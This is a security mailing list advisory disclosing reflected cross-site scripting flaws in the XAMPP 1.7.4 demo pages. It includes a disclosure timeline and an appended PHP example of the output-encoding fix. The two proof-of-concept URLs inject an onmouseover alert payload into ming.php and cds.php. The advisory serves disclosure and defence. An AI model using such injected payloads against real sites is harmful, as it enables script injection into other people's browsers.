[Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] XAMPP 1.7.4 XSS vulnerabilities
- From: sangte amtham <sangteamtham@xxxxxxxxx>
- Date: Fri, 28 Oct 2011 01:45:20 +0700
Please download the attachment
$-------------------------------------------------------------------------------------------------------------------
$ XAMPP 1.7.4 for Windows Multiple Cross-Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download : http://www.apachefriends.org/en/xampp-windows.html
$ Date : 07/12/2011
$ Twitter: http://twitter.com/Sangte_amtham
$******************************************************************************************
1. Description:
XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl.
XAMPP is really very easy to install and to use - just download, extract and start.
2. Patch:
Jul 12, 2011: Contacted the vendor.
Jul 12, 2011: Vendor said that they would fix it in the next release.
Sep 21, 2011: XAMPP 1.7.7 released.
Oct 27, 2011: Bug released.
3. POC:
http://localhost/xampp/ming.php?text=%22%20onmouseover%3dalert%28%22XSS%22%29%20bad%22
http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
adodb.php has a form for submitting database information, but the form input is
not filtered properly, so malicious code can be submitted through it.
http://localhost/xampp/adodb.php
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
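The class of fix the two PoC URLs call for, as an added example that is not part of the original post and is not XAMPP's source code. It assumes the `text` parameter is echoed into a double-quoted attribute and the request path into a single-quoted one, as the shape of the PoC URLs suggests; the markup and the helper names `attr` and `self_url` are hypothetical.

```php
<?php
// Added illustration; hypothetical code, not taken from XAMPP.

// Encode a value for output inside a quoted HTML attribute or element text.
// ENT_QUOTES covers both " and ', the two quote styles the PoC URLs rely on.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Form target built from SCRIPT_NAME, which does not carry the
// client-controlled path suffix that PHP_SELF does (/cds.php/<extra>).
function self_url(array $server): string
{
    return attr($server['SCRIPT_NAME'] ?? '');
}

// Constructed inputs: the URL-decoded values from the advisory's PoC URLs.
$text   = '" onmouseover=alert("XSS") bad"';
$server = [
    'SCRIPT_NAME' => '/xampp/cds.php',
    'PHP_SELF'    => '/xampp/cds.php/\'onmouseover=alert("XSS")>',
];

// Before: raw interpolation, so the quote character closes the attribute
// and the rest of the input is parsed as new attributes.
$unsafe_input = '<input type="text" name="text" value="' . $text . '">';
$unsafe_form  = "<form action='" . $server['PHP_SELF'] . "' method='post'>";

// After: the same markup with attribute-context encoding applied.
$safe_input = '<input type="text" name="text" value="' . attr($text) . '">';
$safe_form  = "<form action='" . self_url($server) . "' method='post'>";

// Print each variant so the difference in the generated HTML is visible.
foreach (compact('unsafe_input', 'safe_input', 'unsafe_form', 'safe_form') as $k => $v) {
    echo str_pad($k, 13), ' ', $v, PHP_EOL;
}
```

In the encoded variants the quotes arrive as `&quot;` and `&#039;`, so the browser keeps the whole input inside the attribute value instead of parsing an `onmouseover` handler.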